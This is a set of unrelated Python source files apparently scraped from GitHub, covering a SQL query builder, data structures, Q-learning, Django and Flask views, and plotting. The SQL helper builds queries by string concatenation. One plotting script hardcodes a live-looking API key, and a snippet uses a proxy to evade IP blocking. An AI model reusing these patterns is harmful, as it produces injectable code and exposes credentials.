\"\"\"+var+\"\"\"=\"\"\"+str(val)\n else:\n condition=\"\"\" WHERE \"\"\"+condition\n for set in update:\n upd_pairs+=set[0]+\"\"\"=\\'\"\"\"+str(set[1])+\"\"\"\\',\"\"\"\n upd_pairs=upd_pairs[:len(upd_pairs)-1]\n que=\"\"\"UPDATE \"\"\"+table+\"\"\" SET \"\"\"+upd_pairs+condition\n return que\n\ndef split_col(dum):\n row=len(dum)\n col=len(dum[0])\n ddum=[[None]]*col\n for i in range(col):\n dddum=[None]*row\n for j in range(row):\n dddum[j]=dum[j][i]\n ddum[i]=dddum\n return ddum\n\n# FOR DEBUGGING ONLY\nif __name__ == '__main__':\n upd_list=[['bar_code',999],['c_locator_id',\"\"\"13000 \"\"\"]]\n con_var='c_locator_id'\n con_val=\"\"\"\\'\\'\"\"\"\n que=update('rpi_ongoing',upd_list,var=con_var,val=con_val)\n print(que)\n","repo_name":"vongalung/PickByLight","sub_path":"modules/psql/psql_functions.py","file_name":"psql_functions.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31265944755","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def push_front(self, data):\n node = Node(data)\n if not self.head:\n self.tail = self.head = node\n return\n\n if not self.head.next:\n node.next = self.tail\n self.head = node\n return \n\n node.next = self.head\n self.head = node\n\n def push_back(self, data):\n node = Node(data)\n if not self.head:\n self.tail = self.head = node\n return\n\n if not self.head.next:\n self.head.next = self.tail = node\n return \n\n self.tail.next = node\n self.tail = node\n\n def pop_front(self):\n if not self.head:\n return\n\n if self.head == self.tail:\n self.head = self.tail = None\n return\n\n node = self.head\n self.head = node.next\n del node\n\n def pop_back(self):\n if not self.head:\n return\n\n if self.head == self.tail:\n self.head = self.tail = None\n return\n\n node = self.head\n while node.next != self.tail:\n node = node.next\n\n self.tail = node\n del node.next\n node.next = None\n\n def insert(self, data, index):\n if index == 0:\n self.push_front(data)\n return\n if not self.get_node(index):\n return\n\n node = Node(data)\n left = self.get_node(index)\n right = left.next\n\n left.next = node\n node.next = right\n\n def erase(self, index):\n if not self.head or index < 0:\n return\n\n if index == 0 and not self.head.next:\n self.pop_front()\n return\n\n left = self.get_node(index)\n if not left or not left.next:\n return\n\n right = left.next.next\n\n del left.next\n left.next = right\n\n def get_node(self, index):\n count = 0\n node = self.head\n\n while count != index - 1:\n if not node:\n return None\n node = node.next\n count +=1\n\n if not node or (not node.next and node != self.head):\n return None\n\n return node\n\n def __str__(self):\n \"\"\" [data] -> [data] -> None \"\"\"\n\n node = self.head\n lst = \"\"\n while node:\n lst += f\"[{node.data}] -> \"\n node = node.next\n\n return lst + f\"[None]\"\n\n","repo_name":"TaV3z/datastructs","sub_path":"linked_list/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8642095183","text":"'''\r\nCreated on Oct 21, 2017\r\n\r\n@author: BHUSHAN\r\n'''\r\nfrom tkinter import *\r\nfrom bhushan.gmail.ui import authorizeClickHandler \r\n\r\nwindow=Tk()\r\nwindow.geometry(\"800x500\")\r\nwindow.resizable(0,0)\r\nwindow.title(\"Welcome to the GMAIL Data Mining\")\r\n#making frames to seperate the connect button and welcome msg\r\n#topFrame=Frame(window)\r\n#topFrame.pack()\r\n\r\n#bottomFrame=Frame(window)\r\n#bottomFrame.pack(side=BOTTOM)\r\n\r\n\r\n#welcome message\r\nWelcomeText=Label(window,text=\"Welcome to the GMAIL Data Mining ..!!\")\r\nWelcomeText.config(font=(\"Courier\", 24))\r\nWelcomeText.grid(row=0,column=0)\r\nWelcomeText.grid(padx=50, pady=50)\r\n\r\n#connect button to authorize the account\r\nConnectButton=Button(window,command=authorizeClickHandler.buttonClick(),text=\"Connect to get insights of your GMAIL Account\",fg='green',bg='black')\r\nConnectButton.config(font=(\"Courier\", 12))\r\nConnectButton.grid(row=1,column=0)\r\nConnectButton.grid(padx=20, pady=120)\r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"bhushanpawar007/GmailAPI","sub_path":"GmailAPI/bhushan/gmail/ui/LoginPage.py","file_name":"LoginPage.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22582323476","text":"# common utility functions\n\nimport subprocess\nimport time\nfrom inspect import getframeinfo, stack\nfrom pathlib import Path\n\nimport yaml\nfrom logzero import logger\n\n\ndef kubectl(args, print_output=True, print_error=True):\n \"\"\"Run kubectl command.\"\"\"\n caller = getframeinfo(stack()[1][0])\n caller_module = Path(caller.filename).stem\n c = f\"[{caller_module}:{caller.lineno}] \"\n command = [\"kubectl\"]\n command.extend(args)\n logger.debug(\" \".join(command))\n process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if print_output:\n if process.stdout != b\"\":\n logger.info(c + process.stdout.decode(\"ascii\"))\n if process.stderr != b\"\":\n logger.error(c + process.stderr.decode(\"ascii\"))\n return process\n\n\ndef wait_for_k8s_resource(\n type, name, namespace=\"istio-system\", instances=1, timeout=600\n):\n \"\"\"Wait for a k8s resource to be ready\"\"\"\n\n while True and timeout > 0:\n timeout -= 1\n process = kubectl(\n [\"get\", type, \"-n\", namespace, name, \"-o\", \"yaml\"],\n print_output=False,\n )\n if process.returncode != 0:\n time.sleep(1)\n print(\"|\", end=\"\", flush=True)\n continue\n result = yaml.safe_load(process.stdout)\n\n if (\n \"readyReplicas\" in result[\"status\"]\n and result[\"status\"][\"readyReplicas\"] == instances\n ):\n break\n time.sleep(1)\n print(\".\", end=\"\", flush=True)\n return 0 if timeout > 0 else 1\n","repo_name":"oneconvergence/dkube_cli","sub_path":"dkube_cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17420264653","text":"from flask_sqlalchemy import SQLAlchemy\nfrom src.utils import retry\nfrom src import app\n\n\n@retry(10, exceptions=(Exception))\ndef getDb():\n return SQLAlchemy(app)\n\n\ndb = getDb()\n\n\nclass User(db.Model):\n __tablename__ = \"users\"\n\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(128), unique=True, nullable=False)\n active = db.Column(db.Boolean(), default=True, nullable=False)\n\n def __init__(self, email):\n self.email = email\n","repo_name":"pspankov/flask_docker_bootstrap","sub_path":"src/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29144500623","text":"# 代理是绕过IP封锁的一种手段\nimport requests\n\n# 寻找免费代理IP\n# ip: 52.183.8.192\n# port: 3128\n\nproxies = {\n \"https\": \"https://52.183.8.192:3128\"\n}\n\nmain_page = requests.get(\"https://www.baidu.com\", proxies=proxies)\nmain_page.encoding = \"utf-8\"\nprint(main_page.text)","repo_name":"AlexT11223344/My_python_project","sub_path":"WebCrawler/15_agent.py","file_name":"15_agent.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27095898686","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nadama\n=====\n\nDefines the base logic of the library to launch orders from command line or\ndirectly in Python scripts\n\"\"\"\n\nimport sys\nimport os\n\nfrom .commandment import Commander, QG\nfrom .exceptions import UnknownOrderError\n\n\nVERSION = ('0', '3', '2', 'beta')\n\n\ndef get_version(command=''):\n \"\"\"Human readable version\n \"\"\"\n version = '.'.join(element for element in VERSION[:3])\n return '{0} {1}'.format(command, version) if command else version\n\n\ndef sir_yes_sir(module='', doc='', options=(), version='', argv=None):\n \"\"\"Launches the right order or displaying the help for a command or an\n order directly from command line.\n \"\"\"\n argv = argv if argv is not None else sys.argv[:]\n command = os.path.basename(argv[0])\n module = module if module else command\n commander = Commander(module, doc=doc, command=command)\n\n # global options and app version made available for the orders\n QG.options = options\n QG.version = version\n\n no_arg = len(argv) == 1\n needs_help = not no_arg and argv[1] == 'help'\n global_help = needs_help and len(argv) == 2\n order_help = needs_help and len(argv) > 2\n\n if no_arg or global_help:\n return commander.explanations()\n else:\n order_name = argv[1] if not order_help else argv[2]\n try:\n order = commander[order_name]\n except UnknownOrderError as uoe:\n return uoe()\n else:\n if order_help:\n return order.explanations()\n else:\n return order(argv[2:])\n\n\ndef call_order(module_name, order_name, *args, **kwargs):\n \"\"\"Calls an order from another python script directly\n \"\"\"\n commander = Commander(module_name)\n order = commander[order_name]\n return order.execute(*args, **kwargs)\n","repo_name":"agrausem/adama","sub_path":"src/adama/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"30598429318","text":"from datetime import datetime\nfrom prettytable import PrettyTable\nimport json\n\n\ndef parsJsonFile(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n dictName = json.load(f)\n return dictName\n\n\ndef parsTxtFile(filename):\n with open(filename, 'r', encoding='utf-8-sig') as f:\n result = {}\n for line in f:\n tempList = line.split()\n if tempList[1] == 'start':\n if tempList[0] in result:\n result[tempList[0]] = getResultTime(tempList[2],\n result[tempList[0]])\n else:\n result[tempList[0]] = tempList[2]\n elif tempList[1] == 'finish':\n if tempList[0] in result:\n result[tempList[0]] = getResultTime(result[tempList[0]],\n tempList[2])\n else:\n result[tempList[0]] = tempList[2]\n\n sorted_tuples = sorted(result.items(), key=lambda item: item[1])\n return sorted_tuples\n\n\ndef getResultTime(start, finish):\n start_ = datetime.strptime(start, '%H:%M:%S,%f')\n finish_ = datetime.strptime(finish, '%H:%M:%S,%f')\n return str(finish_ - start_)\n\n\ndef printResultTables(dictNames, sortedTupleDatesResults):\n table = PrettyTable()\n table.field_names = [\n 'Занятое место',\n 'Нагрудный номер',\n 'Имя',\n 'Фамилия',\n 'Результат'\n ]\n for i, elem in enumerate(sortedTupleDatesResults):\n table.add_row([\n i + 1,\n elem[0],\n dictNames[elem[0]]['Surname'],\n dictNames[elem[0]]['Name'],\n elem[1]\n ])\n print(table)\n\n\nif __name__ == '__main__':\n sortedTupleDatesResults = parsTxtFile('results_RUN.txt')\n dictNames = parsJsonFile('competitors2.json')\n printResultTables(dictNames, sortedTupleDatesResults)\n","repo_name":"trueoss23/Test_Task_Python","sub_path":"src/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21526659949","text":"#!/usr/bin/python3\r\n# -*- coding: UTF-8 -*-\r\n\r\nyear = int(input('year:\\n'))\r\nmonth = int(input('month:\\n'))\r\nday = int(input('day:\\n'))\r\nmonths = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334)\r\nif 0 < month <= 12:\r\n sumd = months[month - 1]\r\n print(sumd)\r\nelse:\r\n print('data error')\r\n\r\nsumd += day\r\nleap = 0\r\nif (year % 400 == 0) or (year % 4 == 0) or (year % 100 != 0):\r\n leap = 1\r\nif (leap == 1) and month > 2:\r\n sumd += 1\r\nprint('it is the %dth day.' % sumd)\r\n","repo_name":"Junli1793/python100q","sub_path":"100q/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"7780923965","text":"import numpy as np\r\nfrom ipywidgets import IntText, IntSlider, Button, HBox, Output\r\nfrom IPython.display import display, clear_output\r\nimport matplotlib.pyplot as plt\r\nimport gym\r\n\r\nclass Agent():\r\n def __init__(self, map):\r\n self.__env = gym.make('FrozenLake-v1', desc=map, render_mode='rgb_array', is_slippery=False)\r\n self.__env.reset()\r\n \r\n self.__action_size = self.__env.action_space.n\r\n self.__observation_size = self.__env.observation_space.n\r\n self.__Q = np.zeros([self.__observation_size, self.__action_size])\r\n \r\n self.__epsilon = 1\r\n self.__alpha = 0.95\r\n self.__gamma = 0.8\r\n self.__lamb = 0.9\r\n self.__epsilon_update = 1000\r\n self.__episode_rewards = []\r\n self.__show_interval = 1000\r\n self.__plot_interval = 1000\r\n \r\n self.__episode = IntSlider(\r\n value=0,\r\n min=0,\r\n max=100000,\r\n step=1,\r\n disabled = True\r\n )\r\n \r\n self.__N_episode = IntText(\r\n value=10000,\r\n description='학습횟수:',\r\n disabled=False\r\n )\r\n \r\n self.__learn_button = Button(\r\n description='학습하기',\r\n disabled=False\r\n )\r\n \r\n self.__test_button = Button(\r\n description='테스트하기',\r\n disabled=False\r\n )\r\n \r\n self.__out = Output()\r\n display(HBox([self.__learn_button, self.__N_episode, self.__episode]), self.__test_button, self.__out)\r\n self.__learn_button.on_click(self.__learn)\r\n self.__test_button.on_click(self.__test)\r\n\r\n def __epsilon_greedy(self, state):\r\n if np.random.rand() > self.__epsilon:\r\n return np.argmax(self.__Q[state, :])\r\n else:\r\n return self.__env.action_space.sample()\r\n \r\n def __learn(self, button):\r\n for _ in range(self.__N_episode.value):\r\n self.__env.reset()\r\n state = 0\r\n rewards = []\r\n done = False\r\n\r\n if self.__episode.value % self.__epsilon_update == 0:\r\n self.__epsilon *= self.__lamb\r\n\r\n if self.__episode.value % self.__plot_interval == 0:\r\n self.__show()\r\n with self.__out:\r\n print(self.__Q)\r\n\r\n while not done:\r\n action = self.__epsilon_greedy(state)\r\n next_state, reward, done, _, info = self.__env.step(action)\r\n self.__Q[state][action] += self.__alpha * (\r\n reward + self.__gamma * self.__Q[next_state].max() - self.__Q[state][action])\r\n state = next_state\r\n rewards.append(reward)\r\n\r\n if self.__episode.value % self.__show_interval == 0:\r\n self.__show()\r\n\r\n try:\r\n self.__episode_rewards[(self.__episode.value)//self.__plot_interval] += sum(rewards)/len(rewards)/self.__plot_interval\r\n except:\r\n self.__episode_rewards.append(sum(rewards)/len(rewards)/self.__plot_interval)\r\n\r\n self.__episode.value += 1\r\n \r\n def __show(self):\r\n with self.__out:\r\n screen = self.__env.render()\r\n clear_output(wait=True)\r\n plt.clf()\r\n \r\n plt.subplot(1,2,1)\r\n plt.plot(np.arange(len(self.__episode_rewards)+1) * self.__plot_interval, [0] + (self.__episode_rewards), marker = 'o')\r\n plt.subplot(1,2,2)\r\n plt.imshow(screen) # screen 배열을 이미지로 출력합니다.\r\n \r\n plt.show()\r\n\r\n def __test(self, button):\r\n with self.__out:\r\n self.__env.reset()\r\n cur_state=0\r\n done = False\r\n self.__show()\r\n while not done:\r\n next_state, reward, done, info,_ = self.__env.step(self.__Q[cur_state].argmax())\r\n cur_state = next_state\r\n with self.__out:\r\n print(\"테스트중입니다....\")\r\n self.__show()","repo_name":"team-monolith-contents/AI_09","sub_path":"09_성장하는_인공지능_강화학습_알아보기/CodleAI.py","file_name":"CodleAI.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71097630031","text":"\nfrom glob import glob\nimport random\n\nimport torch\nfrom torch_geometric.data import Data, Dataset\n\nfrom molecular_graphs import MolecularGraphs\n\nfeatureList = [\"atomic_number\"]\n\nclass MoleculeGraphDataSet(Dataset):\n\n r\"\"\"Data set class to load molecular graph data\"\"\"\n\n def __init__(\n self,\n database_dir: str,\n graphs: MolecularGraphs,\n nMaxEntries: int = None,\n seed: int = 42,\n transform: object = None,\n pre_transform: object = None,\n pre_filter: object = None,\n ) -> None:\n\n r\"\"\"\n\n Args:\n\n database_dir (str): the directory where the data files reside\n\n graphs: an object of class MolecularGraphs whose function is\n to read each file in the data-base and return a\n graph constructed according to the particular way\n implemented in the class object (see MolecularGraphs\n for a description of the class and derived classes)\n\n nMaxEntries (int): optionally used to limit the number of clusters\n to consider; default is all\n\n seed (int): initialises the random seed for choosing randomly\n which data files to consider; the default ensures the\n same sequence is used for the same number of files in\n different runs\n\n \"\"\"\n\n super().__init__(database_dir, transform, pre_transform, pre_filter)\n\n self.database_dir = database_dir\n\n self.graphs = graphs\n\n filenames = database_dir + \"/*.xyz\"\n\n files = glob(filenames)\n\n self.n_molecules = len(files)\n\n r\"\"\"\n filenames contains a list of files, one for each cluster in\n the database if nMaxEntries != None and is set to some integer\n value less than n_molecules, then nMaxEntries clusters are\n selected randomly for use.\n \"\"\"\n\n if nMaxEntries and nMaxEntries < self.n_molecules:\n\n self.n_molecules = nMaxEntries\n random.seed(seed)\n self.filenames = random.sample(files, nMaxEntries)\n\n else:\n\n self.n_molecules = len(files)\n self.filenames = files\n\n def len(self) -> int:\n r\"\"\"return the number of entries in the database\"\"\"\n\n return self.n_molecules\n\n def get(self, idx: int) -> Data:\n\n r\"\"\"\n This function loads from file the corresponding data for entry\n idx in the database and returns the corresponding graph read\n from the file\n \"\"\"\n\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n file_name = self.filenames[idx]\n\n molecule_graph = self.graphs.molecule2graph(file_name)\n\n return molecule_graph\n\n def get_file_name(self, idx: int) -> str:\n\n r\"\"\"Returns the cluster data file name\"\"\"\n\n return self.filenames[idx]\n","repo_name":"migueldc99/gcnn","sub_path":"molecule_graph_dataset.py","file_name":"molecule_graph_dataset.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25785540661","text":"n=int(input())\np=1\ns=0\nt=n\nwhile(n>0):\n d=n%10\n p=p*d\n s=s+d\n n=n//10\nif p==s:\n print('Spy Number')\nelse:\n print('Not Spy Number')","repo_name":"21A91A05D0/codemind-python","sub_path":"Spy_Number.py","file_name":"Spy_Number.py","file_ext":"py","file_size_in_byte":148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5673303655","text":"from django.contrib import messages\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\n\nfrom django_tables2 import RequestConfig\n\nfrom sis.authentication_helpers import role_login_required\n\nfrom sis.elements.section import ProfSectionsTable, SectionFilter\nfrom sis.elements.referenceitem import ReferenceItemForm\nfrom sis.models import (Course, Professor, Section, Semester, Student, Profile, SectionStudent,\n ReferenceItem, SectionReferenceItem)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef index(request):\n data = {\n 'current_semester': Semester.current_semester(),\n 'registration_open': Semester.semesters_open_for_registration(),\n }\n data.update(request.user.profile.unread_messages())\n return render(request, 'professor/home_professor.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef sections(request):\n the_prof = request.user.profile.professor\n sections_qs = Section.objects.filter(professor=the_prof)\n sections = {}\n # set up our sections qs dictionary by semester\n for sect in sections_qs:\n if sect.semester.finalized():\n continue\n if sect.semester.name not in sections.keys():\n sections[sect.semester.name] = [sect.semester.id]\n\n # fill in our sections dictionary with tables by semester\n for name, sem in sections.items():\n qs = sections_qs.filter(semester=sem[0])\n table = ProfSectionsTable(qs)\n RequestConfig(request, paginate={\"per_page\": 25, \"page\": 1}).configure(table)\n sections[name].append(table)\n\n data = {\n 'semesters': sections.keys(),\n }\n if request.method == 'POST':\n sem = request.POST.get('semester')\n table = sections[sem][1]\n data['table'] = table\n else:\n sem = Semester.current_semester()\n if sem is not None:\n sem = sem.name\n values = sections.get(sem)\n if values is not None:\n table = values[1]\n data['table'] = table\n return render(request, 'professor/sections.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef section(request, sectionid):\n data = {}\n aSection = Section.objects.get(id=sectionid)\n references = aSection.sectionreferenceitem_set.all()\n ssects = SectionStudent.objects.filter(section=aSection)\n if request.method == \"POST\":\n for student in aSection.students.all():\n if request.POST.get(str(student.pk)) != 'No Change':\n ssect = ssects.get(student=student)\n grade_value = request.POST.get(str(student.pk))\n ssect.grade = grade_value if grade_value != 'No Grade Assigned' else None\n ssect.save()\n data['grade_submitted'] = {True}\n grades = (\n ('No Change', 'No Change'),\n ('No Grade Assigned', 'No Grade Assigned'),\n ) + SectionStudent.POINTS\n data.update({\n 'grades': grades,\n 'section': aSection,\n 'ssects': ssects,\n 'references': references,\n 'can_grade': not aSection.semester.finalized(),\n })\n return render(request, 'professor/section.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef student(request, studentid):\n stud = Student.objects.get(pk=studentid)\n ssects = stud.sectionstudent_set.all()\n data = {'student': stud, 'ssects': ssects}\n return render(request, 'professor/student.html', data)\n\n\n@role_login_required(Profile.ACCESS_PROFESSOR)\ndef add_reference(request, sectionid):\n data = {'sectionid': sectionid}\n\n if request.method == 'POST':\n form = ReferenceItemForm(request.POST)\n data['form'] = form\n\n if form.is_valid():\n new_ref = form.save(commit=False)\n new_ref.professor = request.user.profile.professor\n section = Section.objects.get(id=sectionid)\n course = Course.objects.get(id=section.course.id)\n new_ref.course = course\n\n try:\n new_ref.save()\n except IntegrityError as e:\n if 'UNIQUE constraint' in e.args[0]:\n messages.error(request, \"That Reference Item already exists.\")\n else:\n messages.error(request,\n \"There was a problem saving the new item to the database.\")\n return render(request, 'professor/reference_add.html', data)\n\n # Specify all current+future sects by reg date or only current sections by reg date\n if request.POST.get('semester_future') == 'future':\n sects_to_update = course.section_set.exclude(\n status__in=[Section.REG_CLOSED, Section.CANCELLED])\n else:\n sects_to_update = course.section_set.filter(semester=section.semester)\n\n for sect in sects_to_update:\n sect.refresh_reference_items()\n messages.success(request, \"New reference item successfully created\")\n return redirect('professor:section', sectionid)\n\n else:\n messages.error(request, \"Please correct the error(s) below\")\n return render(request, 'professor/reference_add.html', data)\n else:\n form = ReferenceItemForm()\n\n data['form'] = form\n return render(request, 'professor/reference_add.html', data)\n","repo_name":"csufmse/student_information_system","sub_path":"student-info-system/professor/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"26051067710","text":"class Solution:\n def checkSubSequence(self, I,P):\n l=r=0\n\n while l < len(I) and r < len(P):\n if I[l] == P[r]:\n l+=1\n r+=1\n else:\n r+=1\n\n if l==len(I):\n return True\n else:\n return False\n\n def lettersToDelete(self, I, P):\n if self.checkSubSequence(I,P) == False:\n return \"IMPOSSIBLE\"\n else:\n return len(P)-len(I)\n\n\nt = int(input())\nfor i in range(t):\n I = input()\n P = input()\n res = Solution().lettersToDelete(I, P)\n print(f\"Case #{i + 1}: {res}\")\n\n","repo_name":"seungjun-green/Google-KickStart","sub_path":"2022/Round A/Speed Typing.py","file_name":"Speed Typing.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"72631231311","text":"import streamlit as st\r\nimport openai\r\nimport time\r\nimport streamlit.components.v1 as components\r\nfrom streamlit.components.v1 import html\r\n\r\ndef main():\r\n\r\n \r\n st.set_page_config(\r\n page_title='p[AI]tch',\r\n initial_sidebar_state='collapsed',\r\n page_icon='📈',\r\n layout=\"wide\")\r\n\r\n hide_streamlit_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_streamlit_style, unsafe_allow_html=True)\r\n\r\n def twitter_follow_button(username):\r\n follow_button = f'@{username}'\r\n return follow_button\r\n \r\n donate = \"\"\"\r\n
\r\n\r\n\r\n\"\"\r\n
\"\"\"\r\n \r\n s,t,q,r,z = st.columns([1,2,6,3,1])\r\n with t:\r\n st.header('📈 p[AI]tch:')\r\n with q:\r\n st.subheader(\r\n 'comparing the effort required to build something with AI a year ago VS now 🌠')\r\n with r:\r\n # Add content to the footer container\r\n st.markdown(\r\n '
chek the code at klein-t/p[AI]tch
', unsafe_allow_html=True)\r\n# Create the follow button\r\n twitter_handle = \"KleinTahiraj\"\r\n st.markdown(f'follow me on Twitter {twitter_follow_button(twitter_handle)}', unsafe_allow_html=True)\r\n ll,rr = st.columns([10,9], gap = 'small')\r\n with ll:\r\n st.markdown(f'or buy me a coffee', unsafe_allow_html=True)\r\n with rr:\r\n html(donate, height=60) \r\n \r\n\r\n n, left, right, m = st.columns(spec = [1,4,4,1], gap = 'medium')\r\n\r\n with left:\r\n st.subheader('ONE YEAR AGO...')\r\n \r\n \r\n tweet = \"\"\"\r\n
\r\n

I forced a bot to watch over 1,000 hours of startup pitch meetings and then asked it to re-create a startup pitch meeting of its own. Here is the first page. pic.twitter.com/BK1yBZ2EB2

— Roshan Patel (@roshanpateI) December 30, 2021\r\n
\r\n \r\n \"\"\"\r\n components.html(tweet, height=800)\r\n\r\n with right:\r\n st.subheader('NOW...')\r\n \r\n\r\n openai.api_key = st.secrets[\"OPENAI_API_KEY\"]\r\n\r\n prompt_path = 'prompt.txt'\r\n with open(prompt_path, \"r\", encoding=\"utf-8\") as prompt:\r\n template = prompt.read()\r\n\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo\",\r\n temperature=0.93,\r\n messages=[\r\n {\"role\": \"system\", \"content\": template},\r\n {\"role\": \"user\", \"content\": \"\\n \\n # NOW IS YOUR TURN### Script: \"},\r\n ],\r\n )\r\n message = output[\"choices\"][0][\"message\"][\"content\"]\r\n output_elem = st.empty()\r\n \r\n stream_message=''\r\n for char in message:\r\n stream_message = stream_message + char\r\n output_elem.markdown(\r\n f'
{stream_message}
', unsafe_allow_html=True)\r\n time.sleep(0.001)\r\n \r\n\r\n x, uno, due, y = st.columns([1, 4, 4, 1], gap='medium')\r\n with uno:\r\n st.markdown(\"\"\"---\"\"\")\r\n st.write('...get the scripts for 1,000 hours of pitches. Clean them. Select the model, likely BERT or GPT-2. Format training data. Fine-tune the model. Wait. Give the model a prompt. Prey. Get a funny (not on purpose) but incoherent output :p')\r\n \r\n with due:\r\n st.markdown(\"\"\"---\"\"\")\r\n st.write('...write a 30-line prompt with some instructions and some examples. Give it to a LLM. Get a funny (on purpose) and coherent output c:')\r\n \r\n \r\n _,ff, dd,_ = st.columns([1, 4, 4, 1], gap='medium')\r\n with ff:\r\n st.write('ESTIMATED TIME: days')\r\n with dd:\r\n st.write('ESTIMATED TIME: 20 minutes')\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"klein-t/p-AI-tch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1376093222","text":"import plotly\nfrom plotly import tools\nimport plotly.graph_objs as go\nfrom plotly.graph_objs import *\nimport plotly.plotly as py\nimport numpy as np\n\n\nclass graph:\n def __init__(self):\n plotly.tools.set_credentials_file(username='LassiPee', api_key='qNE4nDymb62oYrcqhegQ')\n\n def cdf(self, datain, datain2, name1, name2):\n #\n # cumsum = np.cumsum(datain)\n #\n # trace = Scatter(x=[i for i in range(len(cumsum))], y= 10.0 * cumsum / np.linalg.norm(cumsum),\n # marker=dict(color='rgb(150, 25, 120)'))\n # layout = go.Layout(\n # title=\"Cumulative Distribution Function\"\n # )\n #\n # fig = go.Figure(data=go.Data([trace]), layout=layout)\n # py.plot(fig, filename='cdf-dataset')\n #\n # # retrieve event times and latencies from the file\n # compute the CDF\n cdfx = np.sort(datain)\n cdfy = np.linspace(1 / len(datain), 1.0, len(datain))\n # plot the CDF\n trace1 = Scatter(\n x=cdfx,\n y=cdfy,\n name=name1,\n )\n cdfx2 = np.sort(datain2)\n cdfy2 = np.linspace(1 / len(datain2), 1.0, len(datain2))\n # plot the CDF\n trace2 = Scatter(\n x=cdfx2,\n y=cdfy2,\n name=name2,\n )\n\n fig = tools.make_subplots(rows=2, cols=1)\n\n fig.append_trace(trace2, 1, 1)\n fig.append_trace(trace1, 2, 1)\n fig['layout'].update(height=600, width=600, title='CDF curves')\n py.plot(fig, filename='cdf')\n\n def plot(self, x, y1, y2, y3, y4, y5, y1_name, y2_name, y3_name, y4_name, y5_name):\n\n trace1 = Scatter(\n x= x,\n y= y1,\n name=y1_name,\n )\n trace2 = Scatter(\n x=x,\n y=y2,\n name = y2_name,\n )\n trace3 = Scatter(\n x=x,\n y=y3,\n name = y3_name,\n )\n trace4 = Scatter(\n x=x,\n y=y4,\n name = y4_name,\n )\n trace5 = Scatter(\n x=x,\n y=y5,\n name=y5_name,\n )\n cdfx = np.sort(y2)\n cdfy = np.linspace(1 / len(y2), 1.0, len(y2))\n # plot the CDF\n trace6 = Scatter(\n x=cdfx,\n y=cdfy,\n name=y2_name,\n )\n fig = tools.make_subplots(rows=6, cols=1)\n\n fig.append_trace(trace3, 1, 1)\n fig.append_trace(trace2, 2, 1)\n fig.append_trace(trace1, 3, 1)\n fig.append_trace(trace4, 4, 1)\n fig.append_trace(trace5, 5, 1)\n fig.append_trace(trace6, 6, 1)\n fig['layout'].update(height=600, width=600, title='Stacked subplots')\n py.plot(fig, filename='stacked-subplots')\n","repo_name":"LassiHoo/Thesis","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27169542969","text":"from flask import Blueprint,request\nfrom .tasks import check_plugins_task\nfrom app import pa_domain,pa_taskid\nfrom celery_app.utils.utils import get_current_time\n\n\npluginscan_blueprint = Blueprint(\"pluginscan\", __name__, url_prefix='/pluginscan')\n\n@pluginscan_blueprint.route('/scan',methods=['POST'])\n#传入一个插件id的列表,一个二级域名的列表,开始对每一个二级域名进行每一个插件的扫描\ndef 